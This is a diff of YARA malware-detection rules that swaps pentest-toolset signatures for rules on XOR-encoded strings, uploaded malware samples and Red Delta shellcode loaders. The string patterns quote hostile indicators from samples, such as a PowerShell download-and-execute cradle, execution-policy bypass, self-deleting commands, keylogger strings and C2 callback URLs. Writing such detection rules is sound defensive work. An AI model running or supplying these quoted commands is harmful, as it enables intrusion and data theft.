-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L932-L949"
+		description = "Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key."
+		author = "Florian Roth"
+		id = "71e5b399-c384-5330-ae52-4e0a806e7969"
+		date = "2019-10-28"
+		modified = "2023-11-03"
+		old_rule_name = "SUSP_XORed_Mozilla"
+		reference = "https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force()"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xor_hunting.yar#L2-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c1dc349ff44a45712937a8a9518170da8d4ee656"
-		logic_hash = "03da662e8d5dfbae524c4949d90e143714e6c4783e02600e059172e8b09ebc57"
-		score = 70
+		logic_hash = "e1b5c7a0adb4dc65cdf0a653255ac865a0ecebbf1ff08b7fc46d510d5e8aa6c9"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "http://127.0.0.1/error1.asp" fullword ascii
-		$s2 = "password,PASSWORD,pass,PASS,Lpass,lpass,Password" fullword wide
-		$s3 = "\\SHELL" wide
-		$s4 = "WebBrowser1" fullword ascii
+		$xo1 = "Mozilla/5.0" xor ascii wide
+		$xof1 = "Mozilla/5.0" ascii wide
+		$fpa1 = "Sentinel Labs" wide
+		$fpa2 = "<filter object at" ascii
+		$fpb1 = { 64 65 78 0a 30 33 35 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		$xo1 and not $xof1 and not 1 of ( $fpa* ) and not $fpb1 at 0
 }
-rule SIGNATURE_BASE_CN_Honker_MSTSC_Can_Direct_Copy : FILE
+rule SIGNATURE_BASE_SUSP_Xored_MSDOS_Stub_Message : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file MSTSC_can_direct_copy.EXE"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9155cb6f-14b6-524a-9cb9-1a88f7facf4e"
-		date = "2015-06-23"
-		modified = "2022-12-21"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L951-L968"
+		description = "Detects suspicious XORed MSDOS stub message"
+		author = "Florian Roth"
+		id = "9ab52434-9162-5fd5-bf34-8b163f6aeec4"
+		date = "2019-10-28"
+		modified = "2023-10-11"
+		reference = "https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_xor_hunting.yar#L27-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2f3cbfd9f82f8abafdb1d33235fa6bfa1e1f71ae"
-		logic_hash = "5437abd979a8df5ee3f8508f7a5fff85714b5d8a22ab1760fe1e7a8168a8c255"
-		score = 70
+		logic_hash = "b6d7d7242511d2c26122fe2b880cfe39facb5f68ae45e19c1558163f0427c304"
+		score = 55
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "srv\\newclient\\lib\\win32\\obj\\i386\\mstsc.pdb" ascii
-		$s2 = "Clear Password" fullword wide
-		$s3 = "/migrate -- migrates legacy connection files that were created with " fullword wide
+		$xo1 = "This program cannot be run in DOS mode" xor(0x01-0xff) ascii wide
+		$xo2 = "This program must be run under Win32" xor(0x01-0xff) ascii wide
+		$fp1 = "AVAST Software" fullword wide ascii
+		$fp2 = "AVG Netherlands" fullword wide ascii
+		$fp3 = "AVG Technologies" ascii wide
+		$fp4 = "Malicious Software Removal Tool" wide
+		$fp5 = "McAfee Labs" fullword ascii wide
+		$fp6 = "Kaspersky Lab" fullword ascii wide
+		$fp7 = "<propertiesmap>" ascii wide
+		$fp10 = "Avira Engine Module" wide
+		$fp11 = "syntevo GmbH" wide fullword
+		$fp13 = "SophosClean" ascii
+		$fp14 = "SophosHomeClean" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
+		1 of ( $x* ) and not 1 of ( $fp* ) and not uint16( 0 ) == 0xb0b0 and not uint16( 0 ) == 0x5953
 }
-rule SIGNATURE_BASE_CN_Honker_Lcx_Lcx : FILE
+rule SIGNATURE_BASE_Malware_QA_Not_Copy : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - HTRAN - file lcx.exe"
+		description = "VT Research QA uploaded malware - file not copy.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6c2e1e85-6387-5be2-b7b2-5ae8a5cca6df"
-		date = "2015-06-23"
+		id = "d618389b-ec80-5ad1-be44-4b1f3e36c07d"
+		date = "2016-08-29"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L970-L988"
+		reference = "VT Research QA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_malware_set_qa.yar#L13-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0c8779849d53d0772bbaa1cedeca150c543ebf38"
-		logic_hash = "6e81cac14baa9f0ae35eb26f30291cba6f7ef1864f8970b97a3e6e7205d10eb9"
-		score = 70
+		logic_hash = "4001d71101a9c6d4134e7ed4b9b03d34ada62241a668970e21a60d7a23dd7b86"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1410f38498567b64a4b984c69fe4f2859421e4ac598b9750d8f703f1d209f836"
 
 	strings:
-		$s1 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
-		$s2 = "=========== Code by lion & bkbll" ascii
-		$s3 = "Welcome to [url]http://www.cnhonker.com[/url] " ascii
-		$s4 = "-tran   <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
-		$s5 = "[+] Start Transmit (%s:%d <-> %s:%d) ......" fullword ascii
+		$x1 = "U2VydmVyLmV4ZQ==" fullword wide
+		$x2 = "\\not copy\\obj\\Debug\\not copy.pdb" ascii
+		$x3 = "fuckyou888.ddns.net" fullword wide
+		$s1 = "cmd.exe /c ping 0 -n 2 & del \"" fullword wide
+		$s2 = "Server.exe" fullword wide
+		$s3 = "Execute ERROR" fullword wide
+		$s4 = "not copy.exe" fullword wide
+		$s5 = "Non HosT" fullword wide
+		$s6 = "netsh firewall delete allowedprogram" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Postgresql : FILE
+rule SIGNATURE_BASE_Malware_QA_Update : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file PostgreSQL.exe"
+		description = "VT Research QA uploaded malware - file update.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ae90d03c-ef67-5ece-81ae-86947196a81c"
-		date = "2015-06-23"
+		id = "1dce684d-33b0-5588-8325-2a34c0cde32f"
+		date = "2016-08-29"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L990-L1005"
+		reference = "VT Research QA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_malware_set_qa.yar#L39-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1ecfaa91aae579cfccb8b7a8607176c82ec726f4"
-		logic_hash = "f6921e7a7c88d70c77fc30dc273aac3679a3c0ab44d4d4706d7a405f16cff6a1"
-		score = 70
+		logic_hash = "97e0fec7bb4ebf326b449cc0d65eb9f024b33e1d2e54c6d3893164b66c024b2a"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541"
+		hash2 = "6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e"
 
 	strings:
-		$s1 = "&http://192.168.16.186/details.php?id=1" fullword ascii
-		$s2 = "PostgreSQL_inject" fullword ascii
+		$x1 = "UnActiveOfflineKeylogger" fullword ascii
+		$x2 = "BTRESULTDownload File|Mass Download : File Downloaded , Executing new one in temp dir...|" fullword ascii
+		$x3 = "ActiveOnlineKeylogger" fullword ascii
+		$x4 = "C:\\Users\\DarkCoderSc\\" ascii
+		$x5 = "Celesty Binder\\Stub\\STATIC\\Stub.pdb" ascii
+		$x6 = "BTRESULTUpdate from URL|Update : File Downloaded , Executing new one in temp dir...|" fullword ascii
+		$s1 = "MSRSAAP.EXE" fullword wide
+		$s2 = "Command successfully executed!|" fullword ascii
+		$s3 = "BTMemoryLoadLibary: Get DLLEntyPoint failed" fullword ascii
+		$s4 = "I wasn't able to open the hosts file, maybe because UAC is enabled in remote computer!" fullword ascii
+		$s5 = "\\Internet Explorer\\iexplore.exe" ascii
+		$s6 = "ping 127.0.0.1 -n 4 > NUL && \"" fullword ascii
+		$s7 = "BTMemoryGetProcAddress: DLL doesn't export anything" fullword ascii
+		$s8 = "POST /index.php/1.0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Webrobot : FILE
+rule SIGNATURE_BASE_Malware_QA_Tls : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file WebRobot.exe"
+		description = "VT Research QA uploaded malware - file tls.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8b6350b6-17ea-5f44-a42a-875d55bb2de8"
-		date = "2015-06-23"
+		id = "b3b654b1-73cf-5e04-a332-34777f646a66"
+		date = "2016-08-29"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1007-L1023"
+		reference = "VT Research QA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_malware_set_qa.yar#L71-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "af054994c911b4301490344fca4bb19a9f394a8f"
-		logic_hash = "7d7fc9fb9156aa20993dcb809f4e1d3d357f6826dcac7e628dbe6e0f81e5a61a"
-		score = 70
+		logic_hash = "20c849d8c60acd77a28244c7ebcbb2f96b233e74af6c52112a0c828e1de2ed84"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f06d1f2bee2eb6590afbfa7f011ceba9bd91ba31cdc721bc728e13b547ac9370"
 
 	strings:
-		$s1 = "%d-%02d-%02d %02d^%02d^%02d ScanReprot.htm" fullword ascii
-		$s2 = "\\log\\ProgramDataFile.dat" ascii
-		$s3 = "\\data\\FilterKeyword.txt" ascii
+		$s1 = "\\funoverip\\ultimate-payload-template1\\" ascii
+		$s2 = "ULTIMATEPAYLOADTEMPLATE1" fullword wide
+		$s3 = "ultimate-payload-template1" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Baidu_Extractor_Ver1_0 : FILE
+rule SIGNATURE_BASE_Malware_QA_Get_The_Fucking_IP : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Baidu_Extractor_Ver1.0.exe"
+		description = "VT Research QA uploaded malware - file get The FucKinG IP.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "94f3c3d8-aa68-5589-b26f-42315634ff30"
-		date = "2015-06-23"
+		id = "1c992fc5-79cf-532c-a18b-cfcc3406d6ed"
+		date = "2016-08-29"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1025-L1042"
+		reference = "VT Research QA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_malware_set_qa.yar#L89-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1899f979360e96245d31082e7e96ccedbdbe1413"
-		logic_hash = "cba7357ab3cb840b3b115abe00e1a3a712feb036cae816c8ded10d73029efe2b"
-		score = 70
+		logic_hash = "ab6a60142ef0e7a6e079a1b62da0b962dc3b59584b785516e93c74669574a81b"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7b2c04e384919075be96e3412d92c14fc1165d1bc7556fd207488959c5c4d2f7"
 
 	strings:
-		$s3 = "\\Users\\Admin" wide
-		$s11 = "soso.com" fullword wide
-		$s12 = "baidu.com" fullword wide
-		$s19 = "cmd /c ping " fullword wide
+		$x1 = "C:\\Users\\Mdram ahmed\\AppData"
+		$x2 = "\\Local\\Temporary Projects\\get The FucKinG IP\\" ascii
+		$x3 = "get The FucKinG IP.exe" fullword wide
+		$x4 = "get ip by mdr3m" fullword wide
+		$x5 = "MDR3M kik: Mdr3mhm" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of ( $x* ) ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_FTP_Scanning : FILE
+rule SIGNATURE_BASE_Malware_QA_Vqgk : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file FTP_scanning.exe"
+		description = "VT Research QA uploaded malware - file vqgk.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "828a0dc8-3748-5c07-a767-4f9e85968ca1"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1044-L1061"
+		id = "9246d9de-92e5-5cb8-857c-1e222c3d74d5"
+		date = "2016-08-29"
+		modified = "2022-12-21"
+		reference = "VT Research QA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_malware_set_qa.yar#L109-L137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5a3543ee5aed110c87cbc3973686e785bcb5c44e"
-		logic_hash = "5f1c312dc9fa80c120699bacd17d5e4c147ab96f90c619a8c39ec27646a1307f"
-		score = 70
+		logic_hash = "19b7099cdb8a984f1ba6cf88024db398a81ac4f4bf3c16cac40c5ee0e5b465fd"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c"
 
 	strings:
-		$s1 = "CNotSupportedE" fullword ascii
-		$s2 = "nINet.dll" fullword ascii
-		$s9 = "?=MODULE" fullword ascii
-		$s13 = "MSIE 6*" fullword ascii
+		$x1 = "Z:\\devcenter\\aggressor\\external" ascii
+		$x2 = "\\beacon\\Release\\beacon.pdb" ascii
+		$x3 = "%d is an x86 process (can't inject x64 content)" fullword ascii
+		$x4 = "%d is an x64 process (can't inject x86 content)" fullword ascii
+		$s1 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
+		$s2 = "Could not open process token: %d (%u)" fullword ascii
+		$s3 = "\\\\%s\\pipe\\msagent_%x" fullword ascii
+		$s4 = "\\sysnative\\rundll32.exe" ascii
+		$s5 = "Failed to impersonate logged on user %d (%u)" fullword ascii
+		$s6 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
+		$s7 = "could not write to process memory: %d" fullword ascii
+		$s8 = "beacon.dll" fullword ascii
+		$s9 = "Failed to impersonate token from %d (%u)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) or ( 7 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Dirdown_Dirdown : FILE
+rule SIGNATURE_BASE_Malware_QA_1177 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file dirdown.exe"
+		description = "VT Research QA uploaded malware - file 1177.vbs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "80f98131-79bf-580d-87ad-a54a3f14b301"
-		date = "2015-06-23"
-		modified = "2022-12-21"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1063-L1080"
+		id = "363228c1-f9f8-5319-91b2-7eabdd1ca3f8"
+		date = "2016-08-29"
+		modified = "2023-12-05"
+		reference = "VT Research QA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_malware_set_qa.yar#L139-L161"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7b8d51c72841532dded5fec7e7b0005855b8a051"
-		logic_hash = "5e8349096b7d07757c3779e13fba87f770a5ef090bc7efe36fd151c7c180edad"
-		score = 70
-		quality = 85
+		logic_hash = "0fa8e6c048bcc51553e8078a71416013696dd937c1508cd636873eab56c3797f"
+		score = 80
+		quality = 81
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ff3a2740330a6cbae7888e7066942b53015728c367cf9725e840af5b2a3fa247"
 
 	strings:
-		$s0 = "\\Decompress\\obj\\Release\\Decompress.pdb" ascii
-		$s1 = "Decompress.exe" fullword wide
-		$s5 = "Get8Bytes" fullword ascii
+		$x1 = ".specialfolders (\"startup\") & \"\\ServerName.EXE\"" fullword ascii
+		$x2 = "expandenvironmentstrings(\"%%InsallDir%%\") " ascii
+		$s1 = "CreateObject(\"WScript.Shell\").Run(" ascii
+		$s2 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAA" ascii
+		$s3 = "cial Thank's to Dev-point.com" fullword ascii
+		$s4 = ".createElement(\"tmp\")" fullword ascii
+		$s5 = "'%CopyToStartUp%" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 45KB and all of them
+		( uint16( 0 ) == 0x4d27 and filesize < 100KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Xiaokui_Conversion_Tool : FILE
+rule SIGNATURE_BASE_APT_CN_MAL_Reddelta_Shellcode_Loader_Oct20_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Xiaokui_conversion_tool.exe"
+		description = "Detects Red Delta samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "26e30df6-b1d9-5d82-b368-a4a904939aa3"
-		date = "2015-06-23"
+		id = "47417488-e843-5346-9baa-fcce30b884d1"
+		date = "2020-10-14"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1082-L1098"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_reddelta.yar#L2-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "dccd163e94a774b01f90c1e79f186894e2f27de3"
-		logic_hash = "66a77c1fbfecdc02f591c12f69b46e39b7077dfbb5ed2a26a7dcfb11c8b464dc"
-		score = 70
-		quality = 60
+		logic_hash = "1f2406563b863b8ccd0fd8d8d33c576c4b82dabb55a1e4fa8291859323389834"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "30b2bbce0ca4cb066721c94a64e2c37b7825dd72fc19c20eb0ab156bea0f8efc"
+		hash2 = "42ed73b1d5cc49e09136ec05befabe0860002c97eb94e9bad145e4ea5b8be2e2"
+		hash3 = "480a8c883006232361c5812af85de9799b1182f1b52145ccfced4fa21b6daafa"
+		hash4 = "7ea7c6406c5a80d3c15511c4d97ec1e45813e9c58431f386710d0486c4898b98"
 
 	strings:
-		$s1 = "update [dv_user] set usergroupid=1 where userid=2;--" fullword ascii
-		$s2 = "To.exe" fullword wide
-		$s3 = "by zj1244" ascii
+		$x1 = "InjectShellCode" ascii fullword
+		$s1 = "DotNetLoader.exe" wide ascii fullword
+		$s2 = "clipboardinject" ascii fullword
+		$s3 = "download.php?raw=1" wide
+		$s4 = "Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Levint" wide
+		$s5 = "FlashUpdate.exe" wide
+		$s6 = "raw_cc_url" ascii fullword
+		$op1 = { 48 8b 4c 24 78 48 89 01 e9 1a ff ff ff 48 8b 44 }
+		$op2 = { ff ff 00 00 77 2a 8b 44 24 38 8b 8c 24 98 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 240KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and $x1 or 3 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Grouppolicyremover : FILE
+rule SIGNATURE_BASE_APT_CN_MAL_Reddelta_Shellcode_Loader_Oct20_2 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file GroupPolicyRemover.exe"
+		description = "Detects Red Delta samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e581172d-fcea-5281-ba9f-06b35c9a513e"
-		date = "2015-06-23"
+		id = "acb1024a-64af-51ac-84c8-7fe9a5bd4538"
+		date = "2020-10-14"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1100-L1116"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_reddelta.yar#L31-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7475d694e189b35899a2baa462957ac3687513e5"
-		logic_hash = "936d5dea2d44f638abfb5e42f45c0678bcbf769b575b5056db1a1fc41d1643be"
-		score = 70
+		logic_hash = "179265c0b2175bc3d2d581a69e50e9b8b9cc918a6fdc7bcef42fb163c49b077a"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "260ebbf392498d00d767a5c5ba695e1a124057c1c01fff2ae76db7853fe4255b"
+		hash2 = "9ccb4ed133be5c9c554027347ad8b722f0b4c3f14bfd947edfe75a015bf085e5"
+		hash3 = "b3fd750484fca838813e814db7d6491fea36abe889787fb7cf3fb29d9d9f5429"
 
 	strings:
-		$s0 = "GP_killer.EXE" fullword wide
-		$s1 = "GP_killer Microsoft " fullword wide
-		$s2 = "SHDeleteKeyA" fullword ascii
+		$x1 = "\\CLRLoader.exe" wide fullword
+		$x2 = "/callback.php?token=%s&computername=%s&username=%s" ascii fullword
+		$s1 = "DotNetLoader.Program" wide fullword
+		$s2 = "/download.php?api=40" ascii fullword
+		$s3 = "get %d URLDir" ascii fullword
+		$s4 = "Read code failed" ascii fullword
+		$s5 = "OpenFile fail!" wide fullword
+		$s6 = "Writefile success" wide fullword
+		$op1 = { 4c 8d 45 e0 49 8b cc 41 8d 51 c3 e8 34 77 02 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $x* ) or 4 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Wordpressscanner : FILE
+rule SIGNATURE_BASE_APT_CN_MAL_Reddelta_Shellcode_Loader_Oct20_3 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file WordpressScanner.exe"
+		description = "Detects Red Delta samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "79195823-f88b-5c28-8b99-a43a9d6c94af"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1118-L1135"
+		id = "b52836bb-cdef-5416-a8e1-72d0b2298546"
+		date = "2020-10-14"
+		modified = "2022-12-21"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_reddelta.yar#L59-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0b3c5015ba3616cbc616fc9ba805fea73e98bc83"
-		logic_hash = "c6c36ad5ff0ddfbc41464008d293d453bf2d312a6db885217785adf816bd8b20"
-		score = 70
+		logic_hash = "64402f6265f23abf7d6a711aa888c89386c1a754f12286b0efe5fd5d81f15b01"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "740992d40b84b10aa9640214a4a490e989ea7b869cea27dbbdef544bb33b1048"
 
 	strings:
-		$s0 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
-		$s1 = "(http://www.eyuyan.com)" fullword wide
-		$s2 = "GetConnectString" fullword ascii
-		$s4 = "#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)" fullword ascii
+		$s1 = "Taskschd.dll" ascii fullword
+		$s2 = "AddTaskPlanDllVerson.dll" ascii fullword
+		$s3 = "\\FlashUpdate.exe" ascii
+		$s4 = "D:\\Project\\FBIRedTeam" ascii fullword
+		$s5 = "Error %s:%d, ErrorCode: %x" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 4 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Htran_V2_40_Htran20 : FILE
+rule SIGNATURE_BASE_Invoke_Osiris : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file htran20.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9dd1ab4b-108e-55be-b94d-2868ce00855e"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1137-L1156"
+		description = "Osiris Device Guard Bypass - file Invoke-OSiRis.ps1"
+		author = "Florian Roth"
+		id = "ee1a7e10-ffca-58d2-b01f-7444468ceb3c"
+		date = "2017-03-27"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ps_osiris.yar#L10-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
-		logic_hash = "41a85430875df622e7940ef26c6eceaa4e0720b2995521fbb2d4b072207c8e15"
+		logic_hash = "9a93308d6595de647a96716df0799ec690d91b2fb87e0b4a2f47e6b8b52eed97"
 		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
